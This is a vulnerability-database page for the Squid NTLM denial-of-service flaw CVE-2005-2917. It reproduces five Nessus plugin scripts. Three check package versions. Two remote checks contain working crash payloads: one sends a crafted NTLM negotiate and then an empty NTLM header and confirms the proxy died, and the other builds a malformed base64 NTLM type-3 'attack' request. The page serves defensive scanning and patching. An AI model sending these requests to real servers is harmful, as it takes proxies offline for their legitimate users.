Vulnerabilities > CVE-2005-2917 - Denial Of Service vulnerability in Squid 2.5.9

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
NONE
Integrity impact
NONE
Availability impact
PARTIAL
network
low complexity
squid
nessus

Summary

Squid 2.5.STABLE10 and earlier, while performing NTLM authentication, does not properly handle certain request sequences, which allows attackers to cause a denial of service (daemon restart).

Vulnerable Configurations

Part Description Count
Application
Squid
2

Nessus

  • NASL familyCentOS Local Security Checks
    NASL idCENTOS_RHSA-2006-0052.NASL
    descriptionAn updated squid package that fixes a security vulnerability as well as several issues is now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. A denial of service flaw was found in the way squid processes certain NTLM authentication requests. It is possible for a remote attacker to crash the Squid server by sending a specially crafted NTLM authentication request. The Common Vulnerabilities and Exposures project (cve.mitre.org) assigned the name CVE-2005-2917 to this issue. The following issues have also been fixed in this update : * An error introduced in squid-2.5.STABLE6-3.4E.12 can crash Squid when a user visits a site that has a bit longer DNS record. * An error introduced in the old package prevented Squid from returning correct information about large file systems. The new package is compiled with the IDENT lookup support so that users who want to use it do not have to recompile it. * Some authentication helpers needed SETUID rights but did not have them. If administrators wanted to use cache administrator, they had to change the SETUID bit manually. The updated package sets this bit so the new package can be updated without manual intervention from administrators. * Squid could not handle a reply from an HTTP server when the reply began with the new-line character. * An issue was discovered when a reply from an HTTP server was not HTTP 1.0 or 1.1 compliant. * The updated package keeps user-defined error pages when the package is updated and it adds new ones. All users of squid should upgrade to this updated package, which resolves these issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id21976
    published2006-07-05
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21976
    titleCentOS 4 : squid (CESA-2006:0052)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2006:0052 and 
    # CentOS Errata and Security Advisory 2006:0052 respectively.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(21976);
      script_version("1.17");
      script_cvs_date("Date: 2019/10/25 13:36:03");
    
      script_cve_id("CVE-2005-2917");
      script_bugtraq_id(14977);
      script_xref(name:"RHSA", value:"2006:0052");
    
      script_name(english:"CentOS 4 : squid (CESA-2006:0052)");
      script_summary(english:"Checks rpm output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote CentOS host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "An updated squid package that fixes a security vulnerability as well
    as several issues is now available.
    
    This update has been rated as having moderate security impact by the
    Red Hat Security Response Team.
    
    Squid is a high-performance proxy caching server for Web clients,
    supporting FTP, gopher, and HTTP data objects.
    
    A denial of service flaw was found in the way squid processes certain
    NTLM authentication requests. It is possible for a remote attacker to
    crash the Squid server by sending a specially crafted NTLM
    authentication request. The Common Vulnerabilities and Exposures
    project (cve.mitre.org) assigned the name CVE-2005-2917 to this issue.
    
    The following issues have also been fixed in this update :
    
    * An error introduced in squid-2.5.STABLE6-3.4E.12 can crash Squid
    when a user visits a site that has a bit longer DNS record.
    
    * An error introduced in the old package prevented Squid from
    returning correct information about large file systems. The new
    package is compiled with the IDENT lookup support so that users who
    want to use it do not have to recompile it.
    
    * Some authentication helpers needed SETUID rights but did not have
    them. If administrators wanted to use cache administrator, they had to
    change the SETUID bit manually. The updated package sets this bit so
    the new package can be updated without manual intervention from
    administrators.
    
    * Squid could not handle a reply from an HTTP server when the reply
    began with the new-line character.
    
    * An issue was discovered when a reply from an HTTP server was not
    HTTP 1.0 or 1.1 compliant.
    
    * The updated package keeps user-defined error pages when the package
    is updated and it adds new ones.
    
    All users of squid should upgrade to this updated package, which
    resolves these issues."
      );
      # https://lists.centos.org/pipermail/centos-announce/2006-March/012704.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?77b0fa65"
      );
      # https://lists.centos.org/pipermail/centos-announce/2006-March/012728.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?e137b0d6"
      );
      # https://lists.centos.org/pipermail/centos-announce/2006-March/012735.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?5241de4e"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected squid package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:centos:centos:squid");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:centos:centos:4");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/30");
      script_set_attribute(attribute:"patch_publication_date", value:"2006/03/10");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/07/05");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"CentOS Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/CentOS/release", "Host/CentOS/rpm-list");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("rpm.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/CentOS/release");
    if (isnull(release) || "CentOS" >!< release) audit(AUDIT_OS_NOT, "CentOS");
    os_ver = pregmatch(pattern: "CentOS(?: Linux)? release ([0-9]+)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "CentOS");
    os_ver = os_ver[1];
    if (! preg(pattern:"^4([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "CentOS 4.x", "CentOS " + os_ver);
    
    if (!get_kb_item("Host/CentOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && "ia64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "CentOS", cpu);
    
    
    flag = 0;
    if (rpm_check(release:"CentOS-4", reference:"squid-2.5.STABLE6-3.4E.12")) flag++;
    
    
    if (flag)
    {
      security_report_v4(
        port       : 0,
        severity   : SECURITY_WARNING,
        extra      : rpm_report_get()
      );
      exit(0);
    }
    else
    {
      tested = pkg_tests_get();
      if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
      else audit(AUDIT_PACKAGE_NOT_INSTALLED, "squid");
    }
    
  • NASL familyFirewalls
    NASL idSQUID_NTLM_DOS.NASL
    descriptionThe version of Squid, an open source web proxy cache, installed on the remote host will abort if it receives a specially crafted NTLM challenge packet. A remote attacker can exploit this issue to stop the affected application, thereby denying access to legitimate users.
    last seen2020-06-01
    modified2020-06-02
    plugin id20010
    published2005-10-12
    reporterThis script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/20010
    titleSquid Crafted NTLM Authentication Header DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    
    
    include("compat.inc");
    
    if (description) {
      script_id(20010);
      script_version("1.21");
    
      script_cve_id("CVE-2005-2917");
      script_bugtraq_id(14977);
    
      script_name(english:"Squid Crafted NTLM Authentication Header DoS");
     
     script_set_attribute(attribute:"synopsis", value:
    "The remote web proxy server is prone to denial of service attacks." );
     script_set_attribute(attribute:"description", value:
    "The version of Squid, an open source web proxy cache, installed on the
    remote host will abort if it receives a specially crafted NTLM
    challenge packet.  A remote attacker can exploit this issue to stop
    the affected application, thereby denying access to legitimate users." );
      # http://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE10-NTLM-scheme_assert
     script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?133a8605" );
     script_set_attribute(attribute:"solution", value:
    "Apply the patch referenced in the bug report or upgrade to Squid
    2.5.STABLE11 or later." );
     script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
     script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
     script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L");
     script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
     script_set_attribute(attribute:"cvss_score_source", value:"CVE-2005-2917");
     script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
     script_set_attribute(attribute:"exploit_available", value:"false");
    
     script_set_attribute(attribute:"plugin_publication_date", value: "2005/10/12");
     script_set_attribute(attribute:"vuln_publication_date", value: "2005/09/13");
     script_cvs_date("Date: 2019/04/24  9:46:51");
    
    script_set_attribute(attribute:"plugin_type", value:"remote");
    script_set_attribute(attribute:"cpe", value:"cpe:/a:squid-cache:squid");
    script_end_attributes();
    
      script_summary(english:"Checks for NTLM authentication denial of service vulnerability in Squid");
      script_category(ACT_DENIAL);
      script_family(english:"Firewalls");
      script_copyright(english:"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_dependencies("proxy_use.nasl");
      script_require_ports("Services/http_proxy", 8080, 3128);
    
      exit(0);
    }
    
    include("global_settings.inc");
    include("misc_func.inc");
    # keep the old API for that test
    include("http_func.inc");
    
    
    port = get_service(svc:"http_proxy", default: 3128, exit_on_fail: 1);
    
    
    # Make sure it's Squid.
    soc = open_sock_tcp(port);
    if (!soc) exit (0);
    req = http_get(
      item:string("http://www.", rand() % 65536, "nessus.test/"),
      port:port
    );
    send(socket:soc, data:req);
    res = http_recv(socket:soc);
    close(soc);
    if (res == NULL) exit(0);
    
    
    # If it is...
    if ("Server: squid" >< res) {
      # And it's using NTLM authentication...
      if ("Proxy-Authenticate: NTLM" >< res) {
        soc = open_sock_tcp(port);
        if (!soc) exit (0);
    
        # nb: Squid's authentication protocol is outlined at:
        #     <http://squid.sourceforge.net/ntlm/client_proxy_protocol.html> 
    
        # Send a negotiate packet.
        negotiate = raw_string(
          "NTLMSSP", 0x00,                          # NTLMSSP identifier
          0x01, 0x00, 0x00, 0x00,                   # NTLMSSP_NEGOTIATE
          0x07, 0x82, 0x08, 0x00,                   # flags
          crap(length:8, data:raw_string(0x00)),    # calling workstation domain (NULL)
          crap(length:8, data:raw_string(0x00)),    # calling workstation name (NULL)
          0x00
        );
        req1 = str_replace(
          string:req,
          find:"User-Agent:",
          replace:string(
            "Proxy-Connection: Keep-Alive\r\n" ,
            "Proxy-Authorization: NTLM ", base64(str:negotiate), "\r\n",
            "User-Agent:"
          )
        );
        send(socket:soc, data:req1);
        res = http_recv(socket:soc);
        if (res == NULL) exit(0);
    
        # If the server returned a challenge packet...
        if ("Proxy-Authenticate: NTLM Tl" >< res) {
          # Try to crash it.
          req2 = str_replace(
            string:req,
            find:"User-Agent:",
            replace:string(
              "Proxy-Connection: Keep-Alive\r\n" ,
              # nb: a vulnerable server exits w/o a packet.
              "Proxy-Authorization: NTLM\r\n",
              "User-Agent:"
            )
          );
          send(socket:soc, data:req2);
          res = http_recv(socket:soc);
    
          # If there was no result, make sure it's down.
          if (res == NULL) {
            # There's a problem if we can't reconnect.
            if (service_is_dead(port: port) > 0)
    	{
              security_warning(port);
              exit(0);
            }
          }
          else close(soc);
        }
      }
    }
    
  • NASL familyRed Hat Local Security Checks
    NASL idREDHAT-RHSA-2006-0052.NASL
    descriptionAn updated squid package that fixes a security vulnerability as well as several issues is now available. This update has been rated as having moderate security impact by the Red Hat Security Response Team. Squid is a high-performance proxy caching server for Web clients, supporting FTP, gopher, and HTTP data objects. A denial of service flaw was found in the way squid processes certain NTLM authentication requests. It is possible for a remote attacker to crash the Squid server by sending a specially crafted NTLM authentication request. The Common Vulnerabilities and Exposures project (cve.mitre.org) assigned the name CVE-2005-2917 to this issue. The following issues have also been fixed in this update : * An error introduced in squid-2.5.STABLE6-3.4E.12 can crash Squid when a user visits a site that has a bit longer DNS record. * An error introduced in the old package prevented Squid from returning correct information about large file systems. The new package is compiled with the IDENT lookup support so that users who want to use it do not have to recompile it. * Some authentication helpers needed SETUID rights but did not have them. If administrators wanted to use cache administrator, they had to change the SETUID bit manually. The updated package sets this bit so the new package can be updated without manual intervention from administrators. * Squid could not handle a reply from an HTTP server when the reply began with the new-line character. * An issue was discovered when a reply from an HTTP server was not HTTP 1.0 or 1.1 compliant. * The updated package keeps user-defined error pages when the package is updated and it adds new ones. All users of squid should upgrade to this updated package, which resolves these issues.
    last seen2020-06-01
    modified2020-06-02
    plugin id21031
    published2006-03-08
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21031
    titleRHEL 4 : squid (RHSA-2006:0052)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from Red Hat Security Advisory RHSA-2006:0052. The text 
    # itself is copyright (C) Red Hat, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(21031);
      script_version ("1.23");
      script_cvs_date("Date: 2019/10/25 13:36:11");
    
      script_cve_id("CVE-2005-2917");
      script_bugtraq_id(14977);
      script_xref(name:"RHSA", value:"2006:0052");
    
      script_name(english:"RHEL 4 : squid (RHSA-2006:0052)");
      script_summary(english:"Checks the rpm output for the updated package");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote Red Hat host is missing a security update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "An updated squid package that fixes a security vulnerability as well
    as several issues is now available.
    
    This update has been rated as having moderate security impact by the
    Red Hat Security Response Team.
    
    Squid is a high-performance proxy caching server for Web clients,
    supporting FTP, gopher, and HTTP data objects.
    
    A denial of service flaw was found in the way squid processes certain
    NTLM authentication requests. It is possible for a remote attacker to
    crash the Squid server by sending a specially crafted NTLM
    authentication request. The Common Vulnerabilities and Exposures
    project (cve.mitre.org) assigned the name CVE-2005-2917 to this issue.
    
    The following issues have also been fixed in this update :
    
    * An error introduced in squid-2.5.STABLE6-3.4E.12 can crash Squid
    when a user visits a site that has a bit longer DNS record.
    
    * An error introduced in the old package prevented Squid from
    returning correct information about large file systems. The new
    package is compiled with the IDENT lookup support so that users who
    want to use it do not have to recompile it.
    
    * Some authentication helpers needed SETUID rights but did not have
    them. If administrators wanted to use cache administrator, they had to
    change the SETUID bit manually. The updated package sets this bit so
    the new package can be updated without manual intervention from
    administrators.
    
    * Squid could not handle a reply from an HTTP server when the reply
    began with the new-line character.
    
    * An issue was discovered when a reply from an HTTP server was not
    HTTP 1.0 or 1.1 compliant.
    
    * The updated package keeps user-defined error pages when the package
    is updated and it adds new ones.
    
    All users of squid should upgrade to this updated package, which
    resolves these issues."
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/security/cve/cve-2005-2917"
      );
      script_set_attribute(
        attribute:"see_also",
        value:"https://access.redhat.com/errata/RHSA-2006:0052"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected squid package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:squid");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:4");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/30");
      script_set_attribute(attribute:"patch_publication_date", value:"2006/03/07");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/03/08");
      script_set_attribute(attribute:"generated_plugin", value:"current");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Red Hat Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("rpm.inc");
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    release = get_kb_item("Host/RedHat/release");
    if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
    os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
    if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
    os_ver = os_ver[1];
    if (! preg(pattern:"^4([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 4.x", "Red Hat " + os_ver);
    
    if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    cpu = get_kb_item("Host/cpu");
    if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
    if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);
    
    yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
    if (!empty_or_null(yum_updateinfo)) 
    {
      rhsa = "RHSA-2006:0052";
      yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
      if (!empty_or_null(yum_report))
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_WARNING,
          extra      : yum_report 
        );
        exit(0);
      }
      else
      {
        audit_message = "affected by Red Hat security advisory " + rhsa;
        audit(AUDIT_OS_NOT, audit_message);
      }
    }
    else
    {
      flag = 0;
      if (rpm_check(release:"RHEL4", reference:"squid-2.5.STABLE6-3.4E.12")) flag++;
    
      if (flag)
      {
        security_report_v4(
          port       : 0,
          severity   : SECURITY_WARNING,
          extra      : rpm_report_get() + redhat_report_package_caveat()
        );
        exit(0);
      }
      else
      {
        tested = pkg_tests_get();
        if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
        else audit(AUDIT_PACKAGE_NOT_INSTALLED, "squid");
      }
    }
    
  • NASL familyFreeBSD Local Security Checks
    NASL idFREEBSD_PKG_44E7764C261411DA9E1EC296AC722CB3.NASL
    descriptionThe squid patches page notes : Squid may crash with the above error [FATAL: Incorrect scheme in auth header] when given certain request sentences. Workaround: disable NTLM authentication.
    last seen2020-06-01
    modified2020-06-02
    plugin id21422
    published2006-05-13
    reporterThis script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/21422
    titleFreeBSD : squid -- possible denial of service condition regarding NTLM authentication (44e7764c-2614-11da-9e1e-c296ac722cb3)
    code
    #%NASL_MIN_LEVEL 80502
    #
    # (C) Tenable Network Security, Inc.
    #
    # The descriptive text and package checks in this plugin were  
    # extracted from the FreeBSD VuXML database :
    #
    # Copyright 2003-2018 Jacques Vidrine and contributors
    #
    # Redistribution and use in source (VuXML) and 'compiled' forms (SGML,
    # HTML, PDF, PostScript, RTF and so forth) with or without modification,
    # are permitted provided that the following conditions are met:
    # 1. Redistributions of source code (VuXML) must retain the above
    #    copyright notice, this list of conditions and the following
    #    disclaimer as the first lines of this file unmodified.
    # 2. Redistributions in compiled form (transformed to other DTDs,
    #    published online in any format, converted to PDF, PostScript,
    #    RTF and other formats) must reproduce the above copyright
    #    notice, this list of conditions and the following disclaimer
    #    in the documentation and/or other materials provided with the
    #    distribution.
    # 
    # THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS "AS IS"
    # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
    # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
    # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS
    # BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
    # OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT
    # OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
    # BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
    # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
    # OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,
    # EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(21422);
      script_version("1.16");
      script_cvs_date("Date: 2019/08/02 13:32:37");
    
      script_cve_id("CVE-2005-2917");
      script_bugtraq_id(14977);
      script_xref(name:"Secunia", value:"16992");
    
      script_name(english:"FreeBSD : squid -- possible denial of service condition regarding NTLM authentication (44e7764c-2614-11da-9e1e-c296ac722cb3)");
      script_summary(english:"Checks for updated package in pkg_info output");
    
      script_set_attribute(
        attribute:"synopsis", 
        value:"The remote FreeBSD host is missing a security-related update."
      );
      script_set_attribute(
        attribute:"description", 
        value:
    "The squid patches page notes :
    
    Squid may crash with the above error [FATAL: Incorrect scheme in auth
    header] when given certain request sentences.
    
    Workaround: disable NTLM authentication."
      );
      # http://www.squid-cache.org/bugs/show_bug.cgi?id=1391
      script_set_attribute(
        attribute:"see_also",
        value:"https://bugs.squid-cache.org/show_bug.cgi?id=1391"
      );
      # http://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE10-NTLM-scheme_assert
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?133a8605"
      );
      # https://vuxml.freebsd.org/freebsd/44e7764c-2614-11da-9e1e-c296ac722cb3.html
      script_set_attribute(
        attribute:"see_also",
        value:"http://www.nessus.org/u?844fb07b"
      );
      script_set_attribute(attribute:"solution", value:"Update the affected package.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:ND/RL:OF/RC:C");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      script_set_attribute(attribute:"plugin_type", value:"local");
      script_set_attribute(attribute:"cpe", value:"p-cpe:/a:freebsd:freebsd:squid");
      script_set_attribute(attribute:"cpe", value:"cpe:/o:freebsd:freebsd");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2005/09/12");
      script_set_attribute(attribute:"patch_publication_date", value:"2005/09/15");
      script_set_attribute(attribute:"plugin_publication_date", value:"2006/05/13");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_copyright(english:"This script is Copyright (C) 2006-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"FreeBSD Local Security Checks");
    
      script_dependencies("ssh_get_info.nasl");
      script_require_keys("Host/local_checks_enabled", "Host/FreeBSD/release", "Host/FreeBSD/pkg_info");
    
      exit(0);
    }
    
    
    include("audit.inc");
    include("freebsd_package.inc");
    
    
    if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
    if (!get_kb_item("Host/FreeBSD/release")) audit(AUDIT_OS_NOT, "FreeBSD");
    if (!get_kb_item("Host/FreeBSD/pkg_info")) audit(AUDIT_PACKAGE_LIST_MISSING);
    
    
    flag = 0;
    
    if (pkg_test(save_report:TRUE, pkg:"squid<2.5.10_6")) flag++;
    
    if (flag)
    {
      if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());
      else security_warning(0);
      exit(0);
    }
    else audit(AUDIT_HOST_NOT, "affected");
    
  • NASL familyFirewalls
    NASL idSQUID_NTLM_FAKEAUTH.NASL
    descriptionThe remote SQUID server, an open source Proxy server, is vulnerable to a Denial of Service in the fakeauth NTLM authentication module. Exploitation of this bug can allow remote attackers to deny access to legitimate users. Squid 2.5*-STABLE are reported vulnerable.
    last seen2020-06-01
    modified2020-06-02
    plugin id16163
    published2005-01-13
    reporterThis script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    sourcehttps://www.tenable.com/plugins/nessus/16163
    titleSquid NTLM Component fakeauth Multiple Remote DoS
    code
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include( 'compat.inc' );
    
    if (description) {
      script_id(16163);
      script_version ("1.21");
      script_cve_id("CVE-2005-0096", "CVE-2005-0097");
      script_bugtraq_id(12220, 12324);
    
      script_name(english:"Squid NTLM Component fakeauth Multiple Remote DoS");
      script_summary(english:"Squid Remote NTLM fakeauth Denial of Service");
    
       script_set_attribute(
        attribute:'synopsis',
        value:'The remote service is vulnerable to a denial of service.'
      );
    
      script_set_attribute(
        attribute:'description',
        value:'The remote SQUID server, an open source Proxy server, is vulnerable
    to a Denial of Service in the fakeauth NTLM authentication module.
    
    Exploitation of this bug can allow remote attackers to deny access to
    legitimate users.
    
    Squid 2.5*-STABLE are reported vulnerable.'
      );
    
      script_set_attribute(
        attribute:'solution',
        value:'Apply the relevant patch from the vendor advisory.'
      );
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:U/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2005-2917");
      script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"false");
    
      # http://www.squid-cache.org/Versions/v2/2.5/bugs/#squid-2.5.STABLE7-fakeauth_auth
      script_set_attribute(
        attribute:'see_also',
        value:'http://www.nessus.org/u?af6b5d37'
      );
      # http://www.squid-cache.org/Versions/v2/2.5/bugs/squid-2.5.STABLE7-fakeauth_auth.patch
      script_set_attribute(
        attribute:'see_also',
        value:'http://www.nessus.org/u?78f21fa1'
      );
     script_set_attribute(attribute:"plugin_publication_date", value: "2005/01/13");
     script_set_attribute(attribute:"vuln_publication_date", value: "2005/01/08");
     script_cvs_date("Date: 2019/04/24  9:46:51");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:squid-cache:squid");
      script_end_attributes();
    
      script_category(ACT_DESTRUCTIVE_ATTACK);
      script_copyright(english:"This script is Copyright (C) 2005-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
      script_family(english:"Firewalls");
      script_dependencies("proxy_use.nasl");
      script_require_ports("Services/http_proxy", 8080, 3128);
    
      exit(0);
    }
    
    # Keep the old API for that test
    include("http_func.inc");
    include("misc_func.inc");
    
    
    # start script
    
    port = get_service(svc:"http_proxy", default: 3128, exit_on_fail: 1);
    
    
    host = string("http://www.", rand() % 65536, "nessus.test/");
    req = string (
           "GET " , host , " HTTP/1.1\r\n" ,
          "Proxy-Connection: Keep-Alive\r\n" ,
          "Host: " , host , "\r\n" ,
          "User-Agent: ", get_kb_item("global_settings/http_user_agent"), "\r\n" ,
          "Pragma: no-cache\r\n");
    
    type1req = string (req , "Proxy-Authorization: NTLM TlRMTVNTUAABAAAAA7IAAAwADAAsAAAADAAMACAAAABOTkVFU1NTU1VVU1NOTkVFU1NTU1VVU1M=\r\n\r\n");
    
    type3req = string (req , "Proxy-Authorization: NTLM TlRMTVNTUAADAAAAGAAYAGQAAAAYABgAfAAAAAwADABAAAAADAAMAEwAAAAMAAwAWAAAAAAAAADIAAAAAYIAAE5ORUVTU1NTVVVTU05ORUVTU1NTVVVTU05ORUVTU1NTVVVTU0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==\r\n\r\n");
    
    type3req_attack = string (req , "Proxy-Authorization: NTLM TlRMTVNTUAADAAAAGAAYAGQAAAAYABgAfAAAAAwADABAAAAADAAMAEwAAAAMAAwAWAAAAAAAAADIAAAAAYIAAE5ORUVTU1NTVVVTU05ORUVTAFNTVVVTU05ORUVTU1NTVVVTU0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==\r\n\r\n");
    
    
    soc = open_sock_tcp (port);
    if (!soc) exit (0);
    
    # First we send type1 req
    send(socket:soc, data:type1req);
    r = http_recv(socket:soc);
    
    if (!r) exit(0);
    
    
    # Checks if SQUID with Proxy-Authenticate: NTLM
    if (!egrep(pattern:"^Server: squid/", string:r) || !egrep(pattern:"^Proxy-Authenticate: NTLM", string:r))
      exit(0);
    
    # Now type3req
    send(socket:soc, data:type3req);
    r = http_recv(socket:soc);
    
    if (!r) exit(0);
    
    
    close (soc);
    soc = open_sock_tcp (port);
